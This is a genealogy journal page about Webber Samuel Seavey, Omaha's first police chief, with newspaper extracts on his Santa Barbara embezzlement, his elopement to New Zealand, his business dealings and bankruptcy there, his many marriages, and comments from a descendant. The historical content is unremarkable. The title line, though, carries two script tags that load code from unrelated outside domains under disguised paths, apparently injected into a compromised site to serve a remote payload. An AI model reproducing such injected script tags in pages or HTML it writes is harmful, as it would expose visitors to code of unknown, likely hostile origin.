Webber Samuel SEAVEY - Omaha's first Chief of Police - lived in New Zealand 1880-1886<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Webber Samuel SEAVEY - Omaha's first Chief of Police - lived in New Zealand 1880-1886

Journal by ngairedith

born 5 May 1841 in East Machias, Washington, Maine
the 7th of 8 children of John SEAVEY and Phoebe HARMON
1857 moved to Wisconsin and worked as a Woodcutter
1859 moved to Colorado and went gold mining
1862, New Years Day enlists as Private with Company H 5th Iowa Volunteer Cavalry. Promoted to Fourth Sergeant then Quartermaster Sergeant then First Sergeant. Not on the list of prisoners held at Andersonville
1865 mustered out of the Regiment as Captain in August at Nashville
1866 goes to Mississippi and works on the riverboats
1874-1879 was a lawman in Santa Barbara, California
1879 Oct, he leaves for Los Angeles & San Francisco, within 4 months is in NZ
1880-1886 lives in New Zealand (read Timeline below)
1887 in Omaha and is made Chief of the Omaha Police Department
1892 idea of a union for the chief administrators of police of North America
1893 in Chicago (with other leaders) it is called National Police Chiefs Union
1900 he is general agent of the Denver Office of the Thiel Detective Agency
1902 - the union renamed the International Association of Chiefs of Police
1905 - (at least) in Seattle as Detective & Manager, Thiel Detective Agency
he died 28 December 1918 in Seattle, King County, Washington
buried Evergreen Washelli Memorial Park

* photos - also read NOTES below

A couple of years ago I wrote a short Obit on his 'wife', Grace Isadore Seavey who left a husband in Santa Barbara (Charles Paddock) to run away with Webber Seavey (who left a wife and a 3 year old son) and they arrived in New Zealand (after they tired of Honolulu) where Grace drowned in 1884. Webber remarried 9 months after Gracie's death. They later divorced. He returned to the USA, alone, about 1886. The death of Grace Seavey in New Zealand in 1884 is the only death of any Seavey recorded in NZ ...
- Today I received a message from his great, granddaughter Lisa, "I was looking for info about my upstanding and law abiding great-grandfather Webber S. Seavey"... Lisa has now found out that he was prossibly "married" (or otherwise) about 5 or 6 times and this she said came as quite a surprise, to say the least, to his descendants and says her grandmother would 'turn in her grave'

Lisa would like more info on Webber's New Zealand life, so here goes ...
please note ...
the name Seavey is sometimes spelt Seavy I have written it as found

... SANTA BARBARA'S ABSCONDING MARSHAL - Referring to Seavey, ex-City Marshal of Santa Barbara, who recently ran away with the wife of Charles L. Paddock, and who was suspected of official malfeasance, the Santa Barbara Press says:- The statement that Seavey's accounts of the city were all straight, appears, upon investigation, to be true; but it has been ascertained that he had, for several months, followed up a system of peculation in connecting with his duties as collector for the Mission Water Company. His mode of taking the money was ingenious, and was varied to suit the circumtances. In some cases he reported that persons had stopped using Mission water, and after the name was taken off the books of the Company, Seavey still went on collecting from the consumer, who deposed the money was turned over to the Company. In other instances bills were raised from the amount charged upon the books, and the difference pocketed by him.
When Seavey left here, on the 23d of September, he informed his wife that he was going to Arizona, and perhaps New Mexico, to look for a location where he could do better financially than he was doing here. Upon arriving in Los Angeles he wrote to her that he would start the next morning for Prescott, and told her to address letters to him there. Instead of doing as he said, however, he took the next train for San Francisco, where he was seen in company with Mrs Paddock. His wife has been left penniless, with one child, a bright little boy, to care for. Where the couple have fled to is not known, but a letter received from James Joyner, dated at Prescott, says that the elder Mr Joyner thought he saw Seavey on the street in Prescott about the 18th inst. As he has not been seen there since, however, it is extremely doubtful if the person seen was Seavey. A letter written to him by his wife, and addressed to Prescott, was returned to the writer some days ago by the Prescott Postmaster, not having been called for.
It is a bad business

17 FEB 1880 - DUNEDIN
... A meeting of the Brush, Broom and Fibre Company (Limited) was held last evening at the office of Mr S. Clive, Bond street, Mr J. G. Murray in the chair. Very few members were present. The meeting was called to elect a board of directors and an auditor for the current year. Mr Seavey moved, and Mr Henderson seconded, that Messrs Gardner, Henderson, Goldsmith, Murray and Clayton be elected. This was carried unanimously

... GIVING EVIDENCE - W. S. Seavey, partner in the firm of G. T. Clarke and Co., stated that he valued certain goods at the request of the defendant ...

25 JUNE 1881 - DUNEDIN Supreme Courthouse
... MEETING of Mr CLAYTON'S CREDITORS (go to link for full list of credtors)
The first meeting of the creditors of Samuel Clayton, who was adjudicated a bankrupt on creditors' petition on Monday morning, was held at the Supreme Courthouse, in the afternoon. Between 30 and 40 creditors, or representatives of creditors, were present.
The following claims were then lodged:-
Mr S. W. Seavey - £294 8s 7d (equivalent in 2012 to $37,100)

... William Sly v G. T. Clarke and Co - Claim £100, loss and damage sustained by the plaintiff in consequence of negligence on the part of the defendants while acting as his agents

28 SEP 1881 - DUNDEIN Supreme Court
... At the Supreme Court to-day, W. S. Seavey applied to set aside the Trustee's decision re his proof of debt in Clayton's estate for money lent (L250), and two other small sums. The Judge refused to set aside the decision, except in regard to portion of the small amounts; and disallowed proof of debt of the L250 loan. Some rather extraordinary evidence was given. Mr Asher's claim will be gone into to-morrow, and Mr Smythies' claim on Friday

11 OCT 1881 - DUNEDIN
... UNEXPLORED COUNTRY - A public meeting was held yesterday after noon in the Chamber of Commerce for the purpose of considering the advisability of organising a party to prospect that part of the West Coast lying between Lake Manipori and the Sounds. About 25 gentlemen attended, and Mr Robert Wilson, who occupied the chair, called upon Mr Smythies, the originator of the scheme, for an explanation of his view upon the subject ... more
... for this purpose he proposed the formation of a limited liability company, and moved the following resolution:- "That in the opinion of this meeting the Fiord country, between Dusky Bay and Lake Manipori,, should be prospected for minerals, open country, precious stones, &c"
Mr W. S. SEAVEY seconded the resolution, which was carried. The Committee was chosen as follows: R. WILSON, A. PRICE, W. A. H. BURTON, W. SEAVEY, A. C. McINNES, W. PROSSER, J. H. SMITH, G. WATSON, Thomas HOWORTH, E. K. SMYTHIES, E. S. HAY, H. W. SMYTHIES
The meeting then closed with a vote of thanks to the chairman and to the Chamber of Commerce for the use of the room

8 NOV 1882 - Port Chalmers, DUNEDIN
... Webber sends two packages to Oamaru on the 'Maori'

18 AUGUST 1883 - DUNEDIN Resident Magistrate's Court
... In the following cases judgment went for the plaintiffs by default, with costs:-
J. McBRIDE v W. SEAVEY ?8 3s, wages due ($1147)

... INSOLVENCY COURT - Webber Samuel Seavey, Dunedin, quarryman, particulars not filed

... The floods in the north of Wellington have increased in severity and at Woodville two ladies who are well known in Dunedin have been drowned. These are Mrs McKenzie, wife of the well-known contractor and Mrs Seavey, whose husband was a partner of Mr G. T. Clarke, auctioneer, here a couple of years ago. The ladies were, amongst others, being taken on a raft from their house to a place of safety, when the raft capsized and they met their sad fate

... The bodies of the two women, Mrs McKenzie and Mrs Seavey, who were drowned during Tuesday night, were found yesterday four miles from where the mishap occurred. Mrs Seavey's body was still clinging to the raft.

... The FLOODS IN THE NORTH - A terrible fatality occurred here last night, whereby two women were drowned. Rain fell yesterday and all last night in torrents, and as a result the Manawatu River rose with great rapidity. Mr H. McKenzie, contractor for the Manawatu railway and traffic bridge four miles from here, lived in a house on a raised piece of ground on the bank of the river. Shortly after midnight it was found that the house was being surrounded by water, and a raft was made for the purpose of getting the people away from the house. Shortly after 3 o'clock a first attempt was made, the raft being occupied by Mrs McKenzie and her son, Mrs Seavey and her husband, and a man named McMillan. When crossing, however, the raft struck a snag and capsized, but all the occupants got safely on board again. The steering-pole, however, was lost, and the raft was swept again into the surging current of the main stream. Again the raft struck a snag and capsized. The three men somehow got ashore and were picked up nearly insensible, but the two women were drowned, and there seems little hope of ever recovering the bodies.
Mrs McKenzie had been living in Dunedin, and only came to Woodville on Monday last. McKenzie has lost a great quantity of timber, and the sinking machinery has been submerged
... The bodies of both Mrs McKenzie and Mrs Seavey, who were drowned at Woodville in the recent floods there, have been recovered. Mrs McKenzies body will be brought to Dunedin for interment

Grace Isadore Seavey was 37, (1847-1884). She is buried in Plot 13, Block 21 at the Old Gorge Cemetery, Woodville
Mrs Mckenzie was Christina James West McKenzie, (possibly nee CAMERON, aged 47 (1837-1884). She married Hector McKenzie. He became a well-known Dunedin contractor. Hector was working up in Woodville on the Railway & Traffic Bridge north of the Manawatu Gorge at the time. They had at least 5 daughters (interestingly one of them was named America Victoria McKenzie), and according to the newspaper report, but not yet found, they had a son. Christina was visiting Grace Isadore Seavey who was an ex resident of Dunedin. It seems Christina was originally interred in the Old Gorge cemetery, Woodville. She is now buried in Plot 3, Block 4 at Northern Cemetery, Dunedin

... The Napier Municipal Council's correspondence was read:- From Mr SEAVEY, Woodville, asking for particulars relative to the municipal reserve in the Seventy-mile Bush. The Town Clerk said he had sent a copy of the terms on which the Council recently offered the property for lease, but had added that new terms were contemplated.
... From W. S. Seavey, desiring to know if the land adjoining Mr Glassford's property belonging to the Corporation was open for lease

4 OCT 1884 - NAPIER, Hawkes Bay
... WANTED to Purchase, an interest in an established Agency and Commission Business. Apply W. S. Seavy, Masonic Hotel
... Mr W. S. SEAVEY has opened an office in Hastings street and commenced business as valuer, accountant, commission and financial agent

8 OCT 1884 - Notice in the Daily Telegraph, Hawkes Bay
... Mr W. S. Seavey wants soldiers who served in the Northern army of the late American war to know that they are entitled to a pension from the U.S. Government

3 NOV 1884 - NAPIER, Hawkes Bay
... Mr W. S. Seavey, Hastings-street, has for lease (with purchasing clause) a quarter-acre section in the township of Woodville, with new house, shop, and stable thereon

30 NOV 1885 - NAPIER
... ?110 - Two acres valuable land, 1? miles from Napier Post Office, increasing in value daily. Particulars W. S. Seavy, Byron-street

3 DEC 1884 - NAPIER
... Tenders are invited by Mr W. S. Seavey, agent, Hastings-street, for the delivery in trucks at Ormondville, Makatoku ot Tahoraite of matai cord wood, totara mortice fence posts, wire fence posts and house blocks

20 DEC 1884 - NAPIER
... Mr W. S. Seavey, agent, Hastings-street, inserts a notice in reference to passengers travelling from Napier to Woodville and Tahoraite

23 DEC 1884 - NAPIER
... WANTED Four BRIDGE CARPENTERS. Apply on the Works. H. McKENZIE, & Co., or W. S. SEAVY, Napier

29 DEC 1884 - NAPIER
... Persons wishing to subscribe for any American newspaper, magazine, or publication of any kind, are requested to communicate with Mr W. S. Seavey, agent, Hastings-street.
... A rare chance is offered for a pushing young man to engage in the auctioneer's business. Particulars can be had from Mr W. S. Seavey, agent, Hastings-street

3 JAN 1885 - NAPIER
... TO THE EDITOR, Daily Telegraph - Sir, As it is a well-known fact that nearly all the long and finest grades of wool used in the factories throughout the United States of America, are grown in New Zealand and Australia, it might please some of the principal wool growers of Hawkes Bay to have specimens of their wool exhibited at the New Orleans Exhibition which opens next May. In its importance to the United States, this Exhibition, will undoubtedly, rank next to the Centennial of 1876. A gentleman from Dunedin who attends the New Orleans Exhibition will call at Napier at the last of this month en route, and no doubt would be pleased to look after any exhibits placed under his care. I do not know if any space has been allotted to this colony, if not, I am quite sure that the promoters of the Exhibition would cheerfully make room for New Zealand wool, for Americans want it, They are large buyers and consumers, and it is my belief that the time will soon come when ships will be loading wool in New Zealand ports for New York direct. - Yours &c., W. S. SEAVEY

4 JAN 1885 - NAPIER
... It is said that nearly half the exhibitors at the London Health Exhibition have arranged to take part in the Cotton Centennial at New Orleans. It is also probable that a number of the great textile firms of Lancashire will participate in the exhibition. This is the exhibition which Mr W. S. Seavey some time ago in our columns urged that wool-growers of the district should forward exhibits to

8 JAN 1885 - NAPIER
... Mr W. S. Seavey has, to dispose of, an auctioneer's business in a flourishing town in New Zealand

10 JAN 1885 - NAPIER
... Mr W. S. Seavey, Hastings-street, wants contractors, builders, and others to know that he represents several wholesale houses in Dunedin
... Mr W. S. Seavey, Agent, Hastings street, wants immediately carpenters and squarers

27 JAN 1885 - NAPIER
... Mr W. S. Seavey, agent, announces that persons who wish to subscribe direct for any American newspaper, magazine, or periodical, should send their subscriptions before the mail closes next Saturday

7 FEB 1885 - NAPIER
... Mr W. S. Seavey notifies to merchants, builders, contractors, and others that he represents several wholesale firms in Dunedin
... Mr W. S. Seavey, Agent, publishes the prices at which he can supply timber (cut) at Napier

12 Feb 1885 - NAPIER
... Parties wishing to see the country and enjoy a delighful ride to Palmerston or Masterton can engage coaches, etc. on applying to Mr W. S. Seavey, Agent

5 MARCH 1885 - Napier
... Passengers are wanted to fill the vacant seats in the coaches which takes the volunteers from Tahoraite to Masterton, Particulars of Mr W. S. Seavey, Masonic Hotel

... Excursionists to Tahoraite next Thursday wishing to proceed further can arrange for comfortable coaches by applying to Mr W. S. Seavey, agent, Masonic Hotel

31 MARCH 1885 - NAPIER
... This mroning Remeni and his company left overland for Wellington. The coaching arrangements were placed in the capable hands of Mr Seavey who made every provision to ensure their reaching Eketahuna this evening, by an early start in the mornng, Wellington will be reached a little after noon to-morrow in time to catch the steamer

... Mr W. S. Seavey, agent, Masonic Hotel, inserts particulars in reference to a special coach for excursionists to Tahoraite tomorrow
... Mr Seavey has made arrangements to run through coaches from Tahoraite to Palmerston leaving the former place on arrival of the morning train to-morrow. Excursionists will be able to return to Napier on Saturday evening. Those wishing shooting can be accommodated four miles beyond Woodville, and can return any day up to Tuesday. Mr Seavey is apparently wiser in his day and generation than the railway authorities, for he issues return tickets for the coaches at single fares, while the railway authorities charge a fare and a half. The inducement should result in a large number availing themselves of a delightful excursion

11 APRIL 1885 - NAPIER
... Mr W. S. Seavey, agent, Hastings-street, has for sale the whole or part of machinery of a saw-mill in the South Island
... Mr W. S. Seavey, agent, has for sale a country store in Hawkes Bay

... At the meeting of the directors of the Woodville Cheese Factory, held on Monday evening last, Mr W. S. Seavey was appointed the company's agent for the sale of their cheese in Napier and adjoining districts. The cheese is said to be of a very superior quality, comparing favorably with the best colonial article in the market. Samples may be obtained from Mr Seavey's sample rooms after Monday next

28 APRIL 1885 - NAPIER
... Mr W. S. Seavey informs passengers for Masterton or Wellington next Thursday morning that they can get tickets for the coach from Tahoraite to Masterton

7 MAY 1885 - Port of NAPIER
... SHIPPING - The brigantine 'Lizzie Guy', Captain Jas. Stevens, sailed yesterday afternoon with a cargo of 2230 hewn sleepers, shipped by Mr W. S. Seavey, for Oamaru

15 MAY 1885 - NAPIER
... Mr W. S. Seavey, agent, Masonic Hotel, wants three more passengers for special coaches from Tahoraite to Masterton next Monday, arriving at Wellington on Tuesday

21 MAY 1885 - NAPIER
... Mr W. S. Seavey, agent, Hastings-street, is prepared to take orders for advertising for all Australasian, American and West India newspapers
... Mr W. S. Seavey announces that all orders for American newspapers and publication must be sent in before 10 a.m. next Saturday

22 MAY 1885 - NAPIER
... Mr W. Seavey, Agent, has several valuable quarter-acre ections situated in Woodville for sale
... A partner is wanted for an old established brewery. Particulars of Mr W. S. Seavey, Agent
... Mr W. S. Seavey has for sale two properies of 105 acres and 160 acres respectively, situated five miles from Woodville railway station

23 MAY 1885 - NAPIER
.. Mr W. S. Seavey, agent, announces that passengers leaving by Monday morning's train for Woodville, Masterton, or Palmerston, can have special coaches if booked before seven o'clock this evening
... Mr W. S. Seavey has for sale two properties of 105 acres and 150 acres respectively, situated two miles from Woodville railway station

30 MAY 1885 - NAPIER
... Mr W. S. Seavey, has to rent, a suite of offices
... Mr W. S. Seavey, agent, Hastings-street, has for sale a number of building sections at Woodville, also suburban sections from ten to two hundred acres in that rising township
... Mr W. S. Seavey has been appointed agent for Robert Cleave's nurseries, at Invercargill

1 JUNE 1885 - NAPIER
... Mr W. S. Seavey, Agent, Hastings-street, has for sale a sawmill in complete running order

4 JUNE 1885 - NAPIER - 9 months after the death of Grace
... Webber Samuel SEAVEY (aged 44) marries Rachel Elizabeth GOODISON
- no children found. They were divorced
- Elizabeth remarried in 1888 to Edward Spencer Barham BELL & moved to Melbourne, Australia

5 JUNE 1885 - NAPIER
... Mr W. S. Seavey wants to rent three offices, separate or together

13 JUNE 1885 - NAPIER
... Mr W. S. Seavey, agent, has for sale valuable sections in Woodville. Also, small farms in that neighbourhood

18 JUNE 1885 - NAPIER
... Mr W. S. Seavey announces that he is taking orders for the hams and bacon cured by Mr Thomas H. Green, of Christchurch

22 JUNE 1885 - NAPIER
... SHIPPING - The brigatine 'Enterprise', Capt. A. Bell, sailed for Dunedin yesterday morning. She took 1560 railway sleepers purchaed by Mr W. S. Seavey for Dunedin contractors, and about 10 tons of miscellaneous cargo

14 JULY 1885 - NAPIER
... SHIPPING - The schooner 'Western Star' has been chartered by Mr W. S. Seavey to take 200,000 feet of kauri timber from Helensville to Lyttelton, for Messrs Mckenzie and Co's bridge contracting works in Canterbury. The Western Star will sail for Helensville (Auckland) to load on Thursday

... SHIPPING - The brigantine 'Enterprise' sailed for Dunedin yesterday morning with a load of sleepers shipped by Mr W. S. Seavey of this port

... SHIPPING - The brigantine 'Western Star', now loading timber at Helensville, will sail for Lyttelton next Wednesday. She takes 110,000 feet of kauri timber for Messrs H. McKenzie and Co's railway bridge, to be built in Canterbury. She loads at Lyttelton for this port, and is expected here about the 1st of September. Mr W. S. Seavey is her agent for Napier

... Mr W. S. Seavey, land agent, reports having sold to-day section 13, Woodville, for ?410 and subdivisions 189, 190, 192, and 193 of suburban section 74 for ?160 cash
... Messrs BROOKING AND ST CLAIR'S REPORT - At our land sale this afternoon at the Criterion Hotel our sales were as follows: Instructed by Mr W. S. Seavey we sold the following section ... listed here

12 SEP 1885 - NAPIER
... Messrs Greig and McColl recently arrived from the South, and the balance is now on the way here from America Mr W. S. Seavey, local agent for C. B. Rogers and Co's woodworking machinery is supplying the plant for the factory

12 OCT 1885 - NAPIER
... Mr W. S. Seavey, agent, Browning-street, has for sale a well-improved farm at Woodville

7 NOV 1885 - NAPIER
... Mr W. S. Seavey, commission agent has removed his office and sample rooms to Byron-street, midway between the post-office and the beach

... The Court was occupied for a great part of the afternoon with the case of A. Sheddon v W. S. Seavey, a claim of ?10 12s 6d for goods sold and delivered. The defendant claimed a set-off amounting to more than the claim, for goods sold and for services rendered as a commission agent in connection with the attempted sale of some property in Victoria (Australia) alleged to be owned by Mrs Sheddon. The evidence on this latter point was very conflicting, the plaintiff alleging that Mr Seavey offered his services gratuitously. Judgement was reserved until Friday

... In the matter of "The Bankruptcy Act, 1883" and the amendments therof, and in the matter of WEBBER SAMUEL SEAVEY, recently of Napier, in the Provincial District of Hawke's Bay, eCommission Agent, but now in parts unknown. Upon reading the Petition of James Stanistreet LARGE, George SMITH, William Robert BLYTHE and Henry WILLIAMS, filed herein and upon reading the affidavit of John ROCHFORT, of Napier, Law Clerk, I do order that the said WEBBER SAMUEL SEAVY be adjudicated a Bankrupt on the said Petition, and that the first Meeting of Creditors be held at the Supreme Court-house, Napier, on Wednesday, the 5th day of May, 1886 at 2 p.m. - PAUL A. F. BIRCH, Registrar

... A meeting of persons interested in W. S. Seavey will be held on Wednesday next, at 2 p.m.

... A meeting of person interested in Mr W. S. Seavey was held at the Clarendon Hotel this afternoon, when those present decided that no definite action should be taken at present

22 APRIL 1886 - NAPIER
... A notice is inserted re the bankruptcy of W. S. Seavey; meeting of creditors on 5th May, at 2

6 MAY 1886 - NAPIER
... Mr Mayo, grocer, takes the place of W. S. Seavey on the telephone exchange, namely, No. 31
... A meeting of creditors was held to-day in the estate of W. S. Seavy, who has levanted. The liabilities locally are £200 (2012 equivalent of $37,000) while the only asset is the furniture, which was never paid for

4 AUGUST 1887 - from LOS ANGELES
... A REMARKABLE STORY - A Los Angeles correspondent of the 'San Francisco Chronicle" writes:- The story of W. S. Seavy, formerly City Marshal of Santa Barbara, who left his wife and eloped in 1880 with Mrs Charles Paddock, a bosom friend of his wife, is well known. Seavy recently turned up as Chief of Police of Omaha. Seavy was very popular in Santa Barbara. The eloping couple went to Honolulu, and all trace of them was lost till Seavy's election in Omaha recently was announced. The rest of the story has hitherto been unknown. Your reporter found to-day the only person in the United States, besides Seavy, who knowns the sequel. The question "Is Mrs Paddock living at Omaha with Seavey?" has been asked by innumerable people familiar with the case. The following story is derived from a lady in this city of the highest respectability and unquestioned veracity. She said: "Mr and Mrs Seavey, as I shall call them, soon tired of Honolulu and took a steamer for Australia. Arriving at Auckland, (which is in New Zealand) they concluded to make their future home there, and opened a toy shop and did a thriving business. They were a most devoted couple. She was a fair fragile woman and appeared very sad. Her health was delicate. They removed to Dunedin, where Seavy entered into partnership with another man and took a contract away up in a sparsely settled part of the north of the island. Their wives went with them. They built huts and lived like the Australian (sic) pioneers. Before long the country was visited by one of those long rains so frequent in that part of the world and the rivers rose rapidly. The bridge near where the party lived was washed away. The floods did great damage and many lives and much stock were lost.
In common with other settlers, the Seavy party built a raft and embarked, floating down the river, hoping to find themselves fast. Night came on and their terrors increased. Once Mrs Paddock was washed from Seavy's arms, but he miraculously managed to catch her. Again she was carried away and despite all his efforts to save her she drowned. One of the survivors said afterward that when Mrs Paddock was borne away Seavy called: "For God's sake, Gracie, say you forgive me!" That Seavy returned to America alone is attested by Mr Lloyd, of Monrovia, who states that Seavy came from New Zealand to Chicago via London on the same steamer as Mr Lloyd

21 OCT 1887 -
... Some two and a half years ago there arrived in Napier a Mr Webber S. Seavey, bringing a woman with him who passed as his wife. The couple seemed to live very happily together, and Seavey appeared a smart active man of business in the commission agent line. During a flood up-country the so-called Mrs Seavey along with another woman, floated away on a kind of raft and was unfortunately drowned. Seavey, however, did not long remain disconsolate; he united himself in holy bonds of matrimony with a very charming young lady, who at the time he first met her, was assisting to dispense liquid favours at the Masonic Hotel. Presently he disappeared from the confiding gaze of the wife of his bosom - it is said again with another man's wife - and sundry creditors to whom he was under obligations, it is said, to the amount of from ?150 to ?170; and Napier that knew him once knows him no more, for ever. In a number of the New York Police Gazettes a portrait of the dashng and smart ex commission agent of Napier is published with the following letterpress notice:-
"Chief of Police Seavey, of Omaha, has rather a serious charge made against his good name by the Los Angeles, California, Times of May 24th. It relates to his alleged elopement from that city a number of years ago with another man's wife. It reads as follows:- "Omaha's newly appointed chief of police is a man with a record. A few years ago he was City Marshal of Santa Barbara, where he forsook his wife and child, and absconded with a married woman from San Francisco, and now, after all these years that he has been wholly lost sight of as if he were dead, he turns up as one of the guardians of the public peace and morals of the flourishing city of Omaha. Evil deeds do not always meet the punishment they merit, for the devil has not yet forgotten how to put on a false livery, but now and then a man who ventures, in a sense of fancied security, to accept a public office, finds the black past suddenly starts up to confromt him!"
The chief has not yet made any public denial of the charge, but it is hoped that the able copper will be able to come out with flying colours"

20 SEP 1888 - NAPIER
... A meeting of creditors in the bankrupt state of James Bartlett, baker, was held at the Court-house yesterday before the Deputy Assigness. The debtor, who was represented by Mr Dick, attributed his bankruptcy to bad debts and to contact with a pure-souled American patriot named Seavey, once well known in Napier, and since that elected by manhood suffrage to be chief of police of a large Yankee town

20 MARCH 1892 - OMAHA, Nebraska
... Chief W. S. Seavey suggested a lay sermon to Colonel Hogeland which is in the book: Impertinences: selected writings of Elia Peattie, a journalist in the Gilded Age ... The most valuable opinion among the many expressed at the convention of the Boys and Girls' National Home and Employment association was that given by W. S. Seavey, chief of police of the city of Omaha. "My opinion is," said he, "that the best plan for providing against boys becoming tramps is for parents to make home more attractive and interesting for them, for parents to cultivate the acquaintance of their sons. Study their dispositions and desires, and in a kind, considerate, affectionate and indulgent manner, contribute to the wishes of the boys to such an extent as will win their esteem and confidence...

(his women - not verified, put here as notes, more research required)
1866 Webber (aged 25) married Harriet WILSON
- they had 2 sons
1876 Webber (aged 35) married ? HOLLENBROOK?
- they had 1 child?
1880 Webber (aged 39) 'married' Gladys PADDOCK (nee THORNHILL)
- they run off to New Zealand. Gladys drowned there
1885 Webber (aged 44) married Rachel Elizabeth GOODISON no children found
- they divorced, Rachel remarried, moved to Melbourne Australia, had a number of children
1888 Webber (aged 47) married Lilla B. DOOLEY
- they had at least 1 child. They divorced in 1899
1901 Webber (aged 60) married Della E. JOHNSON

Captain WEBBER SEAVEY Fifth Iowa Volunteer Cavalry
... Webber S. Seavey was a twenty year old resident of Hudson, Nebraska when he enlisted in Company H of the Fifth Iowa Cavalry on New Years Day 1862

the annual Webber Seavey Award for Quality in Law Enforcement is named after the above Webber Seavey. The award is open to all law enforcement agencies worldwide with the exception of private corporations or individuals.
... In 1893 Webber S. Seavey, Police Chief from Omaha, Nebraska, became the very first president of the National Chiefs of Police Union - now known as the International Association of Chiefs of Police. He quickly became renown for his ability to not only identify common police problems but to institute practical solutions that set an example for police agencies far and wide.

you can download his book and read it online (16 pages, written in 1910):
My army record - author: Seavey, Webber S. 1841 from old catalog

Webber Samuel Seavey died 28 Dec 1918 in Seattle aged 77

MASONIC HOTEL Napier 1870s
where Webber first met Rachel Elizabeth GOODISON as she poured his beers ...
from the Alexander Turnbull Library Collection

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by ngairedith on 2012-09-06 17:59:24

thank you very much to lisa for her messages, in our endeavor to work out the life of Mr Seavey :)

Subject: Webber S Seavey
To: ngairedith
From: lisa
Date: 2012-09-05 02:06:37
... Thanks so much for all of this info in one place, this is fabulous! Tho', often not very flattering; oh well, I guess we can't choose our ancestors. Still, he's an interesting guy to say the least! Re Notes: I believe they were Harriet Wilson (correct, & the 2 sons were Cliff (Clifford?) and Lawrence), Gladys Hollenbeck, Grace Paddock, then Rachel, great-grandma Lilla, and Della. That's 6 we know of..

Subject: Webber Seavey again
To: ngairedith
From: lisa
Date: 2012-09-05 20:12:25
... Sorry, I think I may have misstated what I thought I knew to be true re Webber's female relationships, and in trying to clarify your notes in your post, I may have further confused the issue. My great-grandmother Lilla Dooley was married once prior to marrying Webber Seavey, and her 1st married name was Hollenbeck - she was Lilla Dooley Hollenbeck Seavey Davis at the time of her death - I think her Hollenbeck marriage is where you obtained that name.

His relationships as I believe they occurred are as follows:
1866 m Harriet Wilson in Wisconsin? (Gran?s half-brother Uncle Lawrence born c 1875, also an older brother Cliff)=(1);
c 1875 ? 1880 ? City Marshall, Santa Barbara; left SB 1879-1880 [divorced approx 1879?] (newspaper articles say he deserted his wife & child in Santa Barbara & eloped with his wife?s best friend, Grace Paddock) traveled the South Seas/Australia/New Zealand/South America ? approx 5 yrs; 2nd wife Grace Isadore Paddock Seavey (were they married?) drowned in a river during a flood in New Zealand in 1884; = (2);
After Grace drowned, according to newspaper articles of the time, he took up with a barmaid (a woman who ?dispensed refreshments?), then left her for a ?married woman?, and later fled New Zealand with creditors on his heels.. = (3 & 4);
1886 Returned to US; went to Omaha ? appointed COP 1887; served there till 1895;
1888 m Lilla Dooley Hollenbeck ? Gran was born in Omaha in 1894; Lilla died c 1903 of pneumonia (she and Webber had previously divorced, she married somebody Davis after her divorce from Webber Seavey);(5)
c 1896 ? 1910 Detective/Manager, Thiel Detective Agency/Seattle WA (time period of Bill Miner, aka The Grey Fox, capture)
Early 1900?s m Grandma Della; = (6);
1918 died Seattle WA age 77

by janilye on 2012-09-08 00:01:30

As usual ngairedith your research is flawless. What a Character! I wish I had a bit of colour like this in my family. Such an intriguing, adventurous life. I mean this guy was fearless, ruthless and clever. He could talk the birds down out of the trees. I can see how he appealed to the women. And let's face it the men must have liked him too, they kept throwing money at him. There's a screen play here.

by lisacava on 2013-09-30 00:11:45

I just came across this again and wanted to reiterate my thanks to you for gathering and posting all this Webber seavey info. Thanks! Lisa Cava.

by lisacava on 2024-10-23 19:58:50

Please see my Webber Seavey biography here, feel free to skip through as much of the early history as you'd like to get to his story. https://drive.google.com/file/d/1EmkzfAOzWn9HSoKPmjSORny-ti6Xz1do/view

by lisacava on 2024-10-23 20:13:04

In this bio document, I have hopefully straightened out/clarified the relationships and children that Webber had. 6 wives, 3. children. One son Clifford Grant Seavey from his first marriage to Harriet Wilson. One son Lawrence Webber Seavey from his second marriage to Charlotte Lottie Lawrence. Then one daughter from his marriage to my great grandmother, Lilla Dooley-Hollenbeck-Seavey-Davis.

by lisacava on 2024-10-23 20:13:08

In this bio document, I have hopefully straightened out/clarified the relationships and children that Webber had. 6 wives, 3. children. One son Clifford Grant Seavey from his first marriage to Harriet Wilson. One son Lawrence Webber Seavey from his second marriage to Charlotte Lottie Lawrence. Then one daughter from his marriage to my great grandmother, Lilla Dooley-Hollenbeck-Seavey-Davis.

by lisacava on 2024-10-23 20:19:42

In this bio document, I have hopefully straightened out/clarified the relationships and children that Webber had. 6 wives, 3. children. One son Clifford Grant Seavey from his first marriage to Harriet Wilson. One son Lawrence Webber Seavey from his second marriage to Charlotte Lottie Lawrence. Then one daughter from his marriage to my great grandmother, Lilla Dooley-Hollenbeck-Seavey-Davis.

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